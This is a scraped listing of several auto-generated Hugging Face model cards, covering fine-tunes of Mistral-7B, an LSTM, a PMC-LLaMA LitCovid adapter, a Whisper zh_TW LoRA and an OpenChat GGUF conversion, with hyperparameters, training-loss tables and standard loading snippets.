"region:us"
] | text-generation | 2024-01-21T23:32:53Z | ---
license: apache-2.0
base_model: mistralai/Mistral-7B-v0.1
tags:
- trl
- sft
- generated_from_trainer
model-index:
- name: mistral-environment-data
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mistral-environment-data
This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on the None dataset.
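A minimal generation sketch, assuming standard 🤗 Transformers loading; the prompt is an illustrative placeholder.
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
repo = "fionazhang/mistral-environment-data"
tokenizer = AutoTokenizer.from_pretrained(repo)
model = AutoModelForCausalLM.from_pretrained(repo, torch_dtype=torch.bfloat16, device_map="auto")
prompt = "Explain how soil carbon sequestration works."  # placeholder prompt
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=128)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```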
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: constant
- lr_scheduler_warmup_ratio: 0.03
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.0a0+git7bcf7da
- Datasets 2.16.1
- Tokenizers 0.15.0
|
CLMBR/binding-domain-lstm-3 | CLMBR | 2024-01-21T23:41:16Z | 1 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T22:41:43Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-domain-lstm-3
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-domain-lstm-3
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9699
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 3
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7862 | 0.03 | 76320 | 4.7490 |
| 4.5033 | 1.03 | 152640 | 4.4718 |
| 4.3621 | 0.03 | 228960 | 4.3375 |
| 4.2771 | 1.03 | 305280 | 4.2549 |
| 4.2156 | 0.03 | 381600 | 4.1983 |
| 4.1699 | 1.03 | 457920 | 4.1582 |
| 4.1302 | 0.03 | 534240 | 4.1273 |
| 4.0971 | 1.03 | 610560 | 4.1029 |
| 4.0699 | 0.03 | 686880 | 4.0839 |
| 4.0479 | 1.03 | 763200 | 4.0686 |
| 4.0271 | 0.03 | 839520 | 4.0558 |
| 4.011 | 0.03 | 915840 | 4.0446 |
| 3.9945 | 1.03 | 992160 | 4.0362 |
| 3.9758 | 0.03 | 1068480 | 4.0277 |
| 3.965 | 1.03 | 1144800 | 4.0209 |
| 3.9495 | 0.03 | 1221120 | 4.0152 |
| 3.9368 | 1.03 | 1297440 | 4.0103 |
| 3.9259 | 0.03 | 1373760 | 4.0055 |
| 3.9195 | 1.03 | 1450080 | 4.0012 |
| 3.9172 | 0.03 | 1526400 | 3.9978 |
| 3.9128 | 1.03 | 1602720 | 3.9946 |
| 3.9092 | 0.03 | 1679040 | 3.9919 |
| 3.9022 | 1.03 | 1755360 | 3.9895 |
| 3.8968 | 0.03 | 1831680 | 3.9873 |
| 3.8901 | 1.03 | 1908000 | 3.9852 |
| 3.8836 | 0.03 | 1984320 | 3.9835 |
| 3.8778 | 1.03 | 2060640 | 3.9819 |
| 3.876 | 0.03 | 2136960 | 3.9803 |
| 3.8693 | 1.03 | 2213280 | 3.9786 |
| 3.8607 | 0.03 | 2289600 | 3.9772 |
| 3.8579 | 1.03 | 2365920 | 3.9760 |
| 3.8521 | 0.03 | 2442240 | 3.9750 |
| 3.8445 | 1.03 | 2518560 | 3.9739 |
| 3.8406 | 0.03 | 2594880 | 3.9733 |
| 3.8394 | 1.03 | 2671200 | 3.9727 |
| 3.8421 | 0.03 | 2747520 | 3.9718 |
| 3.8447 | 1.03 | 2823840 | 3.9712 |
| 3.8463 | 0.03 | 2900160 | 3.9707 |
| 3.8447 | 1.03 | 2976480 | 3.9702 |
| 3.8428 | 0.02 | 3052726 | 3.9699 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
clinicalnlplab/finetuned-PMCLLaMA-13b-LitCovid | clinicalnlplab | 2024-01-21T23:33:28Z | 0 | 0 | peft | [
"peft",
"safetensors",
"llama",
"region:us"
] | null | 2024-01-21T03:03:47Z | ---
library_name: peft
---
## Training procedure
### Framework versions
- PEFT 0.6.0.dev0
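This repository stores only a PEFT (LoRA) adapter, so it must be attached to a PMC-LLaMA-13B base model. A hedged loading sketch follows; the base checkpoint identifier is an assumption not confirmed by this card.
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
from peft import PeftModel
base_id = "axiong/PMC_LLaMA_13B"  # assumed base checkpoint; substitute the PMC-LLaMA-13B weights you actually use
base = AutoModelForCausalLM.from_pretrained(base_id, device_map="auto")
model = PeftModel.from_pretrained(base, "clinicalnlplab/finetuned-PMCLLaMA-13b-LitCovid")
tokenizer = AutoTokenizer.from_pretrained(base_id)
```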
|
bearbearyu1223/whisper-large-peft-lora-zh_TW-v0.1 | bearbearyu1223 | 2024-01-21T23:31:56Z | 0 | 0 | null | [
"safetensors",
"generated_from_trainer",
"base_model:openai/whisper-large-v2",
"base_model:finetune:openai/whisper-large-v2",
"license:apache-2.0",
"region:us"
] | null | 2024-01-21T17:57:45Z | ---
license: apache-2.0
base_model: openai/whisper-large-v2
tags:
- generated_from_trainer
metrics:
- wer
model-index:
- name: whisper-large-peft-lora-zh_TW-v0.1
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# whisper-large-peft-lora-zh_TW-v0.1
This model is a fine-tuned version of [openai/whisper-large-v2](https://huggingface.co/openai/whisper-large-v2) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.1381
- Wer: 0.7855
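Since this checkpoint is a PEFT/LoRA adapter on top of Whisper-large-v2, inference looks roughly like the hedged sketch below; the audio path is a placeholder and the `zh` language hint is inferred from the repo name rather than stated in this card.
```python
import soundfile as sf
from transformers import WhisperForConditionalGeneration, WhisperProcessor
from peft import PeftModel
base_id = "openai/whisper-large-v2"
processor = WhisperProcessor.from_pretrained(base_id)
base = WhisperForConditionalGeneration.from_pretrained(base_id)
model = PeftModel.from_pretrained(base, "bearbearyu1223/whisper-large-peft-lora-zh_TW-v0.1")
audio, sr = sf.read("sample_zh_tw.wav")  # placeholder path; expects 16 kHz mono audio
input_features = processor(audio, sampling_rate=sr, return_tensors="pt").input_features
generated_ids = model.generate(input_features=input_features, language="zh", task="transcribe")
print(processor.batch_decode(generated_ids, skip_special_tokens=True)[0])
```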
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.001
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 50
- num_epochs: 4
### Training results
| Training Loss | Epoch | Step | Validation Loss | Wer |
|:-------------:|:-----:|:----:|:---------------:|:------:|
| 0.2471 | 1.0 | 886 | 0.1639 | 0.5176 |
| 0.1509 | 2.0 | 1772 | 0.1500 | 0.5237 |
| 0.0374 | 3.0 | 2658 | 0.1417 | 0.8449 |
| 0.0057 | 4.0 | 3544 | 0.1381 | 0.7855 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
ddh0/openchat-3.5-0106-GGUF-fp16 | ddh0 | 2024-01-21T23:06:53Z | 0 | 1 | null | [
"gguf",
"text-generation",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | text-generation | 2024-01-21T22:23:24Z | ---
license: apache-2.0
pipeline_tag: text-generation
---
FP16 GGUF of [openchat/openchat-3.5-0106](https://huggingface.co/openchat/openchat-3.5-0106). |